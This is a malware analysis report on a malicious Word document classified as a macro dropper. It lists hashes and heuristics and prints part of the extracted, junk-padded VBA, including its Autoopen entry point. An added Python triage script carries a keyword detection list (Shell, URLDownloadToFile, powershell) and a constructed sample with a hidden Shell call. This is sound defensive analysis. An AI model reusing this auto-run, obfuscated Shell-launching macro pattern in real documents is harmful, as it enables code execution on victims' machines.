Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 84be1f70469a6a14…

MALICIOUS

Office (OLE)

Size: 164.0 KB
Created: 2018-04-26 19:41:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: 39df97f22c3cfb79b2d3f6661607a203
SHA-1: 822835366ce9adc3646dcf07e80b0fc52bf86d92
SHA-256: 84be1f70469a6a144eb43543644d395beb8ee83a5a5d67a7642357c35d266a0d
Risk score: 202

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a Word document whose VBA project declares an AutoOpen procedure, so the macros run as soon as the document is opened with macros enabled, and contains a Shell() call, the usual hand-off from VBA to an external command; ClamAV classifies it as Doc.Dropper.Agent-6528427-0. The VBA source is padded with junk: every procedure, including Autoopen, is filled with Select Case blocks that compare variables never assigned anywhere in the visible source against integer literals, so none of those branches ever execute and the Round/Hex/CByte/Log assignments inside them are unreachable. Under On Error Resume Next, the only live statement in the Autoopen body shown in the preview is the call AHWBTKoP (OcpoJZ + vAWVCvpE + CLNGWl), whose argument is assembled from three names that are not defined anywhere in the visible preview; that procedure, the construction of its argument and the Shell() call flagged by the heuristics all lie beyond the truncation point and are where manual analysis should continue. The dropper classification and the Shell() call show that the macro hands off to a further stage, but no download URL was recovered statically: the only URL extracted is the DrawingML schema namespace from the document body, which is benign. Whether the second stage is embedded in the document or fetched from the network has to be settled by fully deobfuscating the macro or by detonating the sample in a sandbox. Note also that the wording of the Legacy WordBasic finding below ("no modern VBA project was recovered") conflicts with the 54 KB VBA project that was in fact extracted; treat that finding as a duplicate sighting of the same AutoOpen marker covered by OLE_VBA_AUTOOPEN, not as evidence of a separate WordBasic-era execution path.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6528427-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6528427-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    The VBA code invokes Shell(), the macro-language primitive for launching an external process; combined with an auto-exec entry point this yields code execution on document open.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    The VBA project declares an AutoOpen procedure (spelled Autoopen in the extracted source), which Word runs without further user interaction once macros are enabled.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body). This is the DrawingML XML namespace that Office writes into its own markup, not a network indicator; it should not be read as a download or command-and-control location.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 54066 bytes
SHA-256: d500d7e720216c380c18f837a061b79ff862782fb8573194096f265083b85a42
Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "QXoiYBp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub nSwOU(wiDFU)
Select Case vPMPSq
         Case 58035
            DwwEh = wjQuF
            DLBLc = Round(73527)
            Xqvwl = Hex(KGYVcX - ChrW(CvIpWr))
            CaRNIA = ojOBnj
         Case 42368
            bHBKI = CByte(44258)
            YLoWb = Log(ICLok)
End Select
End Sub
Sub RzYhn(wWWJTo)
Select Case HwTAnL
         Case 68263
            rBGYl = fjhCM
            bEIDZ = Round(26659)
            JApPr = Hex(fTWoBY - ChrW(BtawSI))
            LTppG = mPDoQ
         Case 51879
            mZJCm = CByte(28941)
            FFIrf = Log(kBhdMk)
End Select
Select Case LNqKA
         Case 16360
            NQQiYa = qbkYJD
            wGKwJc = Round(43827)
            iZcfJN = Hex(jwCii - ChrW(poZTE))
            tZzFCh = PHfMqj
         Case 26110
            hqGsQl = CByte(35245)
            lWfYXG = Log(lfFzd)
End Select
Select Case kUZzc
         Case 97107
            EmLzR = HwTant
            hMjWJK = Round(17322)
            uhkikQ = Hex(WjuomB - ChrW(zKhHnw))
            RESDB = YlDoSp
         Case 53302
            EbPjT = CByte(20176)
            mfwGau = Log(YoBWK)
End Select
End Sub
Sub ccSii(ZkdGWz)
Select Case dujSa
         Case 37857
            rfYTzb = LMOmvi
            hcIkz = Round(62718)
            rJZcJA = Hex(TpVbD - ChrW(izEwh))
            DNXOT = STwRai
         Case 55283
            CAWzqn = CByte(52339)
            sXsLr = Log(ckYKC)
End Select
Select Case dXTuGB
         Case 82174
            TBPnwQ = ibEIt
            kVAWHj = Round(19890)
            MtPjlJ = Hex(jbtpzu - ChrW(qHFNbn))
            JTBILs = TYwSj
         Case 79881
            HzGMG = CByte(79644)
            zLSwlk = Log(sRuHWt)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case aOYaQ
         Case 55335
            DuWQE = jHwAVw
            JHiLZ = Round(15434)
            aGDLK = Hex(Ejlimp - ChrW(kvQwj))
            tvkStl = ttTfM
         Case 1602
            FmwrL = CByte(12999)
            mCWPO = Log(lPOqmf)
End Select
AHWBTKoP (OcpoJZ + vAWVCvpE + CLNGWl)
Select Case HwwZlZ
         Case 46713
            sODfF = dfcshI
            dwIhlU = Round(11037)
            oQtdzi = Hex(PQBGU - ChrW(jakiT))
            YjlNo = miBqsz
         Case 9062
            iDwJC = CByte(12263)
            NPLrb = Log(mtVXCS)
End Select
End Sub
Sub jvDCE(NAPYXC)
Select Case Bdjcb
         Case 54317
            sLQZW = pAkfS
            hkljAw = Round(9773)
            tGzqo = Hex(ZlINtw - ChrW(EbViif))
            KMQjGh = RQtjj
         Case 42377
            UmNZl = CByte(64348)
            ErXmWP = Log(IQFVQN)
End Select
Select Case jqOkGU
         Case 16986
            PhNaA = pHEtwD
            VszkS = Round(85162)
            zoKPI = Hex(nvzpiN - ChrW(icpYvP))
            TJAcSK = KzQAnb
         Case 1429
            bXzSS = CByte(94070)
            HOOlYW = Log(DYoDAo)
End Select
Select Case nhzzvc
         Case 96179
            prliNB = bdwua
            lOjlP = Round(34386)
            sMkbMf = Hex(pzUWUv - ChrW(ZXzuJ))
            kwKGFN = BTRMjK
         Case 6854
            cGJRhN = CByte(56204)
            JZaicM = Log(jqFZJv)
End Select
End Sub
Sub dWwrm(iHqJr)
Select Case wQqdcf
         Case 14191
            BhiiL = bkVblt
            bcnSqa = Round(13484)
            BjRnuP = Hex(qNduCb - ChrW(wrPjzu))
            lPYwnV = CKlEAZ
         Case 99841
            NvQaAt = CByte(16442)
            qrTbfw = Log(KcMwP)
End Select
End Sub

Attribute VB_Name = "toHtmoDrqC"
Sub AwiTP(tEdRh)
Select Case TtIGG
         Case 53447
            ndkiTG = jOFFG
            pSbhR = Round(67985)
            FTrmCL = Hex(ozdhwP - ChrW(OXPUK))
            GqizX = hRASb
         C
... (truncated)
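As an added, worked example (my own code, not the report's scanner and not oletools), the script below applies the reasoning from the summary and the heuristics above to the obfuscation pattern visible in this preview: it strips Select Case blocks whose selector is never bound and whose labels are all non-zero integer literals, then reports the live statements of each auto-exec procedure, the procedures they call, and any Shell()-class keywords, and separates schema-namespace URLs from real network indicators. The embedded VBA is a constructed miniature of the preview; the Shell line inside AHWBTKoP, the keyword list, the benign-namespace list and all function names are assumptions for illustration, not facts taken from the report.

```python
"""Added triage helper for junk-padded VBA (example code, not the report's scanner)."""
import re

# Constructed sample mirroring the report's obfuscation pattern. The Shell line in
# AHWBTKoP is assumed: the heuristics report a Shell() call, but the preview never reaches it.
SAMPLE_VBA = r'''Attribute VB_Name = "QXoiYBp"
Sub AHWBTKoP(wCmd)
Select Case HwTAnL
         Case 68263
            bEIDZ = Round(26659)
End Select
Shell wCmd, vbHide
End Sub
Sub Autoopen()
On Error Resume Next
Select Case aOYaQ
         Case 55335
            JHiLZ = Round(15434)
         Case 1602
            FmwrL = CByte(12999)
End Select
AHWBTKoP (OcpoJZ + vAWVCvpE + CLNGWl)
End Sub
'''
AUTOEXEC = {"autoopen", "auto_open", "autoexec", "autoclose",
            "document_open", "document_close", "workbook_open"}
SUSPICIOUS = ("Shell", "CreateObject", "GetObject", "WScript.Shell", "URLDownloadToFile",
              "XMLHTTP", "ADODB.Stream", "Environ", "powershell", "cmd.exe")  # assumed list
BENIGN_URL_PREFIXES = ("http://schemas.openxmlformats.org/", "http://schemas.microsoft.com/",
                       "http://www.w3.org/", "http://purl.org/")  # XML namespaces, not C2

def bound_names(src):
    """Identifiers assigned, declared or taken as parameters anywhere in the source."""
    names = set(re.findall(r'^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=', src, re.I | re.M))
    names |= set(re.findall(r'\b(?:Dim|Const|Static)\s+([A-Za-z_]\w*)', src, re.I))
    for params in re.findall(r'(?:Sub|Function)\s+\w+\s*\(([^)]*)\)', src, re.I):
        for p in params.split(","):
            m = re.match(r'\s*(?:Optional\s+)?(?:ByVal\s+|ByRef\s+)?([A-Za-z_]\w*)', p, re.I)
            if m:
                names.add(m.group(1))
    return {n.lower() for n in names}

def strip_dead_select_blocks(src):
    """Drop `Select Case X` blocks where X is never bound (an implicit Variant holding Empty,
    which compares equal to 0) and every Case label is a non-zero integer literal.
    Blocks with Case Else, Case 0, string or range labels are kept as possibly live."""
    bound = bound_names(src)
    out, block, in_block, dead = [], [], False, True
    for line in src.splitlines():               # assumes no nested Select Case (none in the preview)
        s = line.strip()
        if not in_block:
            m = re.match(r'^Select\s+Case\s+([A-Za-z_]\w*)$', s, re.I)
            if m and m.group(1).lower() not in bound:
                in_block, block, dead = True, [line], True
            else:
                out.append(line)
            continue
        block.append(line)
        m = re.match(r'^Case\s+(.+)$', s, re.I)
        if m and not re.fullmatch(r'[1-9]\d*', m.group(1).strip()):
            dead = False                        # Case Else / Case 0 / strings: possibly live
        elif re.match(r'^End\s+Select$', s, re.I):
            in_block = False
            if not dead:
                out.extend(block)
    return "\n".join(out)

def split_procedures(src):
    """Map each Sub/Function name to its non-blank body lines."""
    procs, name, body = {}, None, []
    for line in src.splitlines():
        s = line.strip()
        m = re.match(r'^(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)', s, re.I)
        if m:
            name, body = m.group(1), []
        elif re.match(r'^End\s+(?:Sub|Function)\b', s, re.I):
            if name is not None:
                procs[name] = body
            name = None
        elif name is not None and s:
            body.append(s)
    return procs

def triage(src):
    """Live statements and callees of each auto-exec procedure, plus suspicious keywords per procedure."""
    clean = strip_dead_select_blocks(src)
    procs = split_procedures(clean)
    report = {"autoexec": {}, "calls": {}, "suspicious": {},
              "lines_removed": len(src.splitlines()) - len(clean.splitlines())}
    for name, body in procs.items():
        text = " ".join(body)
        if name.lower() in AUTOEXEC:
            report["autoexec"][name] = body
            report["calls"][name] = [p for p in procs if p != name
                                     and re.search(r'\b%s\b' % re.escape(p), text, re.I)]
        hits = sorted(kw for kw in SUSPICIOUS
                      if re.search(r'(?<![\w.])%s(?!\w)' % re.escape(kw), text, re.I))
        if hits:
            report["suspicious"][name] = hits
    return report

def classify_url(url):
    """Only URLs outside the well-known schema namespaces count as indicators."""
    return "schema-namespace" if url.lower().startswith(BENIGN_URL_PREFIXES) else "network-indicator"
```

On the full 54 KB macros.bas the same pass would be run over the decoded source that olevba emitted; the result to read first is the live body of Autoopen and the chain of calls from it, since that is where the argument eventually handed to Shell() is assembled. Blocks with Case Else, Case 0, string or range labels are deliberately left in place, because an Empty selector does match those.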